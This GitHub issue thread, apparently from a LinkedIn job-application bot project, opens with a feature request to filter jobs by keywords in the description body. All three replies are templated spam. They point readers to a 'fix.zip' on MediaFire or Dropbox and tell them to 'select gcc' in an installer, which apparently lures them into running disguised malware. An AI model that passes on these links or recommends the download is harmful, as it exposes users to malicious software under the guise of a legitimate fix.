### ISSUE TITLE
Suggested Feature: Job posting body description parsing

### ISSUE THREAD

**Issue by RaccoonWang** [feder-cr/linkedIn_auto_jobs_applier_with_AI#74]
I noticed that while the bot parses job titles, it does not parse job body descriptions.

For example, if i was looking for "Software engineer roles", I would usually read the body of the JD closely to see if any tech matches my experience or if it touches areas that I would like to avoid.

For example, I am a backend engineer who uses mostly Python and Java. I do not like frontend and would like to avoid React and Javascript in general. But these are usually disclosed the in body of the JD, not the title

You can adopt both whitelisting and blacklisting approaches for these keywords

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
